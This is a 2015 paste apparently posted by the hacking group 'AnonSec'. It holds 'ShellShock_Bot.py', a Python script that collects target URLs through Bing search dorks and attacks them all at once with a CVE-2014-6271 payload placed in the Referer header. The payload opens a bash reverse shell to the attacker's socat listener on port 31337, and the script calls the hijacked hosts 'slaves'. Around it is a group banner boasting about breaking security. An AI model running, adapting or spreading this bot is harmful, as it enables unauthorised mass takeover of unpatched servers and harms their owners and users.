Shellshock-Bingbot.py

SUBMITTED BY: Guest

DATE: May 10, 2015, 7:48 a.m.

FORMAT: Text only

SIZE: 6.6 kB

Raw Download

HITS: 1028

Report
  1. We are...
  2. _____ _________
  3. / _ \ ____ ____ ____ / _____/ ____ ____
  4. / /_\ \ / \ / _ \ / \ \_____ \_/ __ \_/ ___\
  5. / | \ | ( <_> ) | \/ \ ___/\ \___
  6. \____|__ /___| /\____/|___| /_______ /\___ >\___ >
  7. \/ \/ \/ \/ \/ \/
  8. //Laughing at your security since 2012*
  9. =================================================================================================
  10. Official Members: Mrlele - AnonSec666 - 3r3b0s - d3f4ult - 4prili666h05t - Hannaichi - ap3x h4x0r
  11. - Gh05tFr3ak - xCyb3r 3vil7 - Hassouna Khalil - spider64
  12. =================================================================================================
  13. #!/usr/bin/env python
  14. #
  15. # \!/ Enter your No-Ip address or other listening address in line 91 \!/
  16. # Launch socat tcp-l:31337,reuseaddr,fork exec:./ShellShock_Bot_CC before executing script!
  17. #
  18. # We are Anonsec
  19. # Beware of our Cyber-Mafia
  20. # We do not forgive
  21. # We do not forget
  22. # Expect Us
  23. #
  24. print "###########################################################"
  25. print "### ShellShock_Bot.py ###"
  26. print "### Mass Bing ShellShock Dork Exploiter ###"
  27. print "### CVE-2014-6271 ###"
  28. print "### *************************************************** ###"
  29. print "### \!/Anonsec\!/ ###"
  30. print "### \!/ SHELLS INCOMMING \!/ ###"
  31. print "### ###"
  32. print "### _.-''|''-._ ###"
  33. print "### .-' | `-. ###"
  34. print "### .'\ | /`. ###"
  35. print "### .' \ | / `. ###"
  36. print "### \ \ | / / ###"
  37. print "### `\ \ | / /' ###"
  38. print "### `\ \ | / /' ###"
  39. print "### `\ \ | / /' ###"
  40. print "### _.-`\ \ | / /'-._ ###"
  41. print "### ~~(8:> {_____`\\|//'______} ~~(8:> ###"
  42. print "### `-' ###"
  43. print "### ###"
  44. print "### twitter.com/_d3f4ult ###"
  45. print "###########################################################"
  46. from gevent import monkey
  47. monkey.patch_all()
  48. from gevent.pool import Pool
  49. from gevent import joinall
  50. import urllib
  51. import urllib2
  52. import argparse
  53. import sys
  54. import json
  55. import socket
  56. socket.setdefaulttimeout(60)
  57. VULN_FOUND = None
  58. def parse_args():
  59. #Create the arguments
  60. parser = argparse.ArgumentParser()
  61. parser.add_argument("-s", "--search", help="Search terms")
  62. parser.add_argument("-p", "--pages", default="1", help="Number of pages of results to fetch where there's 50 results per page; defaults to 1")
  63. parser.add_argument("-k", "--key", help="Your Bing API key found at https://datamarket.azure.com/account")
  64. return parser.parse_args()
  65. def bing_search(query, key, offset, **kwargs):
  66. #Make the search
  67. username = ''
  68. baseURL = 'https://api.datamarket.azure.com/Bing/Search/'
  69. query = urllib.quote(query)
  70. user_agent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)'
  71. credentials = (':%s' % key).encode('base64')[:-1]
  72. auth = 'Basic %s' % credentials
  73. url = baseURL+'Web?Query=%27'+query+'%27&$top=50&$format=json&$skip='+offset
  74. print '[*] Scanning -> '+url
  75. password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
  76. password_mgr.add_password(None, url, username, key)
  77. handler = urllib2.HTTPBasicAuthHandler(password_mgr)
  78. opener = urllib2.build_opener(handler)
  79. urllib2.install_opener(opener)
  80. try:
  81. readURL = urllib2.urlopen(url, timeout=60).read()
  82. except Exception as e:
  83. sys.exit('[-] Failed to fetch bing results. Are you sure you have the right API key?\n Error: '+str(e))
  84. return readURL
  85. def action(result):
  86. #Make the payloaded request and check the response's headers for the echo msg
  87. global VULN_FOUND
  88. exploit = "() { :;}; /bin/bash -i >& /dev/tcp/NO-IP/31337 0>&1"
  89. ua = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'
  90. url = result['Url']
  91. req = urllib2.Request(url)
  92. req.add_header('User-Agent', ua)
  93. req.add_header('Referer', exploit)
  94. try:
  95. r = urllib2.urlopen(req, timeout=60)
  96. except Exception as e:
  97. return
  98. resp_headers = r.info()
  99. if 'shellshock' in r.info():
  100. VULN_FOUND = True
  101. print '[!] SHELLSHOCK VULNERABLE:', url
  102. return
  103. def result_concurrency(results):
  104. #Open all the greenlet threads
  105. in_parallel = 100
  106. pool = Pool(in_parallel)
  107. jobs = [pool.spawn(action, result) for result in results]
  108. return joinall(jobs)
  109. def main():
  110. args = parse_args()
  111. if not args.search:
  112. sys.exit('[!] Specify a search term, eg, ./shellshock_bot.py -s "dorks"')
  113. if not args.key:
  114. sys.exit('[!] Specify a Bing API key or get one here: https://datamarket.azure.com/dataset/bing/search')
  115. key = args.key
  116. if len(key) not in (44, 43):
  117. sys.exit('[-] Incorrect key length')
  118. query = args.search
  119. pages = int(args.pages)
  120. offset = 0
  121. total_results = []
  122. for x in xrange(pages):
  123. # Start off with offset = 0
  124. if x != 0:
  125. offset += 50
  126. response = bing_search(query, key, str(offset))
  127. results = json.loads(response)['d']['results']
  128. if len(results) == 0:
  129. print '[-] No more results found'
  130. break
  131. total_results += results
  132. print '[*] Trying to inject vuln targets... plz wait ~~(8:>'
  133. result_concurrency(total_results)
  134. if not VULN_FOUND:
  135. print '[+] Check ShellShock_Bot_CC for new slaves [+]'
  136. if __name__ == "__main__":
  137. main()
comments powered by Disqus